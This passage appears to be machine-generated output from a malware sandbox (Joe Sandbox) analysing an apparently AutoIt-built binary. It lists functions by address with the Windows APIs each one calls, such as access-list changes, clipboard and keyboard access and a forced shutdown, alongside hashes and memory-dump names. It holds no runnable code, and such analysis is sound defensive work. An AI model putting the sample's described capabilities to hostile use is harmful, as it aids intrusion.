Instruction Fuzzy Hash: DC110A32600205ABDF14FF64DD16FAD77A6AF40B10F14442FF592AB2E1DE78AA05B750

Function 01008402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 01008440

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: d374f3d311a6b5af67ddea401336bcd465707ede16adf6be6bbead75dbd26a5f
Instruction ID: 88115d139422b21e92edd4a02dad9b110e91a9222586bb2933ccadbb71cc8f35
Opcode Fuzzy Hash: d374f3d311a6b5af67ddea401336bcd465707ede16adf6be6bbead75dbd26a5f
Instruction Fuzzy Hash: 8211487190410AAFDB06DF58E9409DE7BF9FF48300F01809AF848AB341DB31DA11CBA4

Function 01005000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 01004C7D: RtlAllocateHeap.NTDLL(00000008,00FD1129,00000000,?,01002E29,00000001,00000364,?,?,?,00FFF2DE,01003863,010A1444,?,00FEFDF5,?), ref: 01004CBE

_free.LIBCMT ref: 0100506C

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: 5e8dca7e150cf7d344b10f94ded27be0a59cbca9c17a02b67e705159b1b4137a
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: 7E012B722043055BF323CE599C4499EFBECFB85270F25051DE1C4872C0EA306805CA74

Function 00FFE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: 2870e560871c4e9d6c1568b27c5cd85f9a547272a3a8b62ad37626ae1d7dc924
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: F6F02D32920E1C96D7333E658C04BBA33989F62330F100716F665D71F0DB74D401A9A5

Function 01004C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00FD1129,00000000,?,01002E29,00000001,00000364,?,?,?,00FFF2DE,01003863,010A1444,?,00FEFDF5,?), ref: 01004CBE

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 19164ea08e5f6952d95dc9055c021db33abc34fa1ce1c8905e8a35033fe88cd6
Instruction ID: 807cca69f80908dd42bc034b934ae2fbcc20a3f088263ea11cd351e962c9dfce
Opcode Fuzzy Hash: 19164ea08e5f6952d95dc9055c021db33abc34fa1ce1c8905e8a35033fe88cd6
Instruction Fuzzy Hash: CDF0B43160022C67FBA35E669C09F6B3BC8AF417A0F084161FB99EA1D4CB35D40046E8

Function 01003820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,010A1444,?,00FEFDF5,?,?,00FDA976,00000010,010A1440,00FD13FC,?,00FD13C6,?,00FD1129), ref: 01003852

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d871a61536783a69ec361397fd92ac5da58bf10246a05de0707c7bd82dfcde5d
Instruction ID: d5884f2b058cbf24406a722b06812c2019f863f25db3f4f51ab3928b72c925c2
Opcode Fuzzy Hash: d871a61536783a69ec361397fd92ac5da58bf10246a05de0707c7bd82dfcde5d
Instruction Fuzzy Hash: 77E065311017299EF7732A6A9C05BAB3A89BF426B0F0501E1FED59E5D1DB25EA0183F1

Function 00FD4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,010A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FD4F6D

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: e482138ec1420e9f8b8278e2ebf4c33047d9e7ea831bcbcfdfd1ef9c4175ab63
Instruction ID: 758da958ad098c2cfab47a6241142af78be3d9bcc26c12b3670cf7f4fd82b309
Opcode Fuzzy Hash: e482138ec1420e9f8b8278e2ebf4c33047d9e7ea831bcbcfdfd1ef9c4175ab63
Instruction Fuzzy Hash: 4FF03071505751CFDB359F64D490922BBF5AF14329318897FE1EA83630C731A844EF10

Function 01062A55 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 01062A66

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: c856cdf39ca7b12ef9c2e67eeaca041c0063808c20e46e21b8146a421c290593
Instruction ID: affb98328b986534776d9503bf9cb60df9cf008eaedc0534d7bab95f60ae8e8e
Opcode Fuzzy Hash: c856cdf39ca7b12ef9c2e67eeaca041c0063808c20e46e21b8146a421c290593
Instruction Fuzzy Hash: 84E02636350117ABD720EA30DCC08FE774CEF602907000436ECE6C6100DB34A99182E0

Function 00FD30F2 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 00FD314E

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 4c5732a7c645a09f28f550ebd90c39b59c0aa9257ef2612cc3573750df0659cb
Instruction ID: 89f5f5636568150d5e51d16eeb1f525a110298a58a992f47109d80dcd56852a9
Opcode Fuzzy Hash: 4c5732a7c645a09f28f550ebd90c39b59c0aa9257ef2612cc3573750df0659cb
Instruction Fuzzy Hash: A4F0A7719003189FE762DF24D8457D67BBCAB01708F0000E5A2C896285DB795788CF41

Function 00FD2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00FD2DC4

Part of subcall function 00FD6B57: _wcslen.LIBCMT ref: 00FD6B6A

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: f7adc9df84ddb6a63cea3d3a7f8b355fa40f5f813c1b0d66107d0914ac88fd9a
Instruction ID: 48ac6af07303ca716591873c3471a1a5e296cb743c86dd32b97bc22756cb9cfe
Opcode Fuzzy Hash: f7adc9df84ddb6a63cea3d3a7f8b355fa40f5f813c1b0d66107d0914ac88fd9a
Instruction Fuzzy Hash: EFE0CD726041245BC721A2589C05FDA77DDDFC8790F040076FD49D724CD974AD808650

Function 00FD2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00FD3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FD3908

Part of subcall function 00FDD730: GetInputState.USER32 ref: 00FDD807

SetCurrentDirectoryW.KERNEL32(?), ref: 00FD2B6B

Part of subcall function 00FD30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00FD314E

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: e4d7b751816abe19691b5be2a4a5cd9eaa75b5a15115e5dfe3350641e385efa6
Instruction ID: 79fa7a0aa32b944c6d4863f1f671b04a94e653d01f646aca1beb22feb4051445
Opcode Fuzzy Hash: e4d7b751816abe19691b5be2a4a5cd9eaa75b5a15115e5dfe3350641e385efa6
Instruction Fuzzy Hash: 7FE0263270420402CA04BB74AC1246DB74B9BD1351F88053FF28283353CE7D4A456352

Function 0103DF27 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 0103DF40

Part of subcall function 00FD6B57: _wcslen.LIBCMT ref: 00FD6B6A

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: FolderPath_wcslen
String ID:
API String ID: 2987691875-0
Opcode ID: dc4e99980f6c524bbeb9db69a52062f1b281f95720b74b07e9f5683b01606115
Instruction ID: 62298e3cae696a8a785dbe2ac47dc9765b8cbcb94f6ec8476e100d67dd05c115
Opcode Fuzzy Hash: dc4e99980f6c524bbeb9db69a52062f1b281f95720b74b07e9f5683b01606115
Instruction Fuzzy Hash: 4FD05EB2A002282BEF60E6749D0DDF73AACC780250F0006A178ADD3152E924DD4486B0

Function 0101039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,01010704,?,?,00000000,?,01010704,00000000,0000000C), ref: 010103B7

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4e3a0b452ff7ccdb9f1555dc64106fe0bf60d66870a336a6f127f754342134f5
Instruction ID: d6fb79117f2053f2d6affabce41156853937d56249e1fc94309cdac6f161e810
Opcode Fuzzy Hash: 4e3a0b452ff7ccdb9f1555dc64106fe0bf60d66870a336a6f127f754342134f5
Instruction Fuzzy Hash: 50D06C3204010DFBDF128F84DD06EDA3BAAFB48714F014000FE5856020C736E821AB90

Function 00FD1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00FD1CBC

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 3303c62dd2069b02f761bdd6db85cdfd646d25b76e500510769427ee9d2f6209
Instruction ID: 8b1f48b39f199d850f188b09c2e32a8d2087fcdb776cedf2e376f5d70f0e50e9
Opcode Fuzzy Hash: 3303c62dd2069b02f761bdd6db85cdfd646d25b76e500510769427ee9d2f6209
Instruction Fuzzy Hash: EFC09B36280704DFF2344A90BD4AF107755B348B10F448001F6C9555D7C3B71450DB50

Non-executed Functions

Function 01030B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 010310F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01031114
Part of subcall function 010310F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,01030B9B,?,?,?), ref: 01031120
Part of subcall function 010310F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,01030B9B,?,?,?), ref: 0103112F
Part of subcall function 010310F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,01030B9B,?,?,?), ref: 01031136
Part of subcall function 010310F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0103114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01030BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 01030C00
GetLengthSid.ADVAPI32(?), ref: 01030C17
GetAce.ADVAPI32(?,00000000,?), ref: 01030C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 01030C6D
GetLengthSid.ADVAPI32(?), ref: 01030C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 01030C8C
HeapAlloc.KERNEL32(00000000), ref: 01030C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 01030CB4
CopySid.ADVAPI32(00000000), ref: 01030CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01030CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 01030D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 01030D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01030D45
HeapFree.KERNEL32(00000000), ref: 01030D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01030D55
HeapFree.KERNEL32(00000000), ref: 01030D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01030D65
HeapFree.KERNEL32(00000000), ref: 01030D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 01030D78
HeapFree.KERNEL32(00000000), ref: 01030D7F

Part of subcall function 01031193: GetProcessHeap.KERNEL32(00000008,01030BB1,?,00000000,?,01030BB1,?), ref: 010311A1
Part of subcall function 01031193: HeapAlloc.KERNEL32(00000000,?,00000000,?,01030BB1,?), ref: 010311A8
Part of subcall function 01031193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,01030BB1,?), ref: 010311B7

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: f191ae0be6679eaf95594140cd64876761de90e14391edd78a59a53da82e9900
Instruction ID: 7632634019419939cc80d93b6df0b354d9cc76cb34c90178d721eb90b6b9ebb8
Opcode Fuzzy Hash: f191ae0be6679eaf95594140cd64876761de90e14391edd78a59a53da82e9900
Instruction Fuzzy Hash: CF719D7590120AABEF20EFA8DD48BEEBBFCBF45300F044195FA94A6194D775A905CB60

Function 0104698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 010469BE
FindClose.KERNEL32(00000000), ref: 01046A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 01046A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 01046A75

Part of subcall function 00FD9CB3: _wcslen.LIBCMT ref: 00FD9CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 01046AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 01046ADF

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 01046B6A
%03d, xrefs: 01046DA2
%02d, xrefs: 01046C00, 01046C0A, 01046C5A, 01046CAA, 01046CFA, 01046D4A
%4d, xrefs: 01046BB1
%4d%02d%02d%02d%02d%02d%03d, xrefs: 01046B32

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: d2897cdda3c0a8ed2d6f077d6997730080498010f80e12a23759c15c75b9832f
Instruction ID: c2462a4eba1ff1fe58e52217705736c6a41ae610ff6f0fb6f58c86b3779731f6
Opcode Fuzzy Hash: d2897cdda3c0a8ed2d6f077d6997730080498010f80e12a23759c15c75b9832f
Instruction Fuzzy Hash: 56D182B1508301AFD310EBA4CC91EABB7EDAF88704F44491EF585C7291EB79DA44DB62

Function 0104ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0104ED91
EmptyClipboard.USER32 ref: 0104ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0104EDAC
CloseClipboard.USER32 ref: 0104EEA3

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: acc108c61bb502c0bc0e3cfc348f11cc846743caf7719085ecf126eaceb278a1
Instruction ID: babc42bac95da38c92b3c6a7831d4689abbd8c5e7e65a190700bbaa6f69c7313
Opcode Fuzzy Hash: acc108c61bb502c0bc0e3cfc348f11cc846743caf7719085ecf126eaceb278a1
Instruction Fuzzy Hash: F4418D75204611AFE721DF19D488B19BBE5FF48318F04C0A9E89A8B662C77AFC41CB90

Function 0103E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 010316C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0103170D
Part of subcall function 010316C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0103173A
Part of subcall function 010316C3: GetLastError.KERNEL32 ref: 0103174A

ExitWindowsEx.USER32(?,00000000), ref: 0103E932

Strings

, xrefs: 0103E920
SeShutdownPrivilege, xrefs: 0103E902
@, xrefs: 0103E925
, xrefs: 0103E95C

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: c697a9bc40abe1edfb24679dc2e8d04462e1e722006086ddf00d1c9cf9cfc56e
Instruction ID: 80ebed5fcc2eead0c79f8891104191edd3015d95d09cba3b71592ab51d7080a8
Opcode Fuzzy Hash: c697a9bc40abe1edfb24679dc2e8d04462e1e722006086ddf00d1c9cf9cfc56e
Instruction Fuzzy Hash: BE01D672610211ABFB6426B8DD85BFF729C9798750F054A23FDC2E21D1D5A55C4083A0

Function 0103AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0103ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0103AC0D
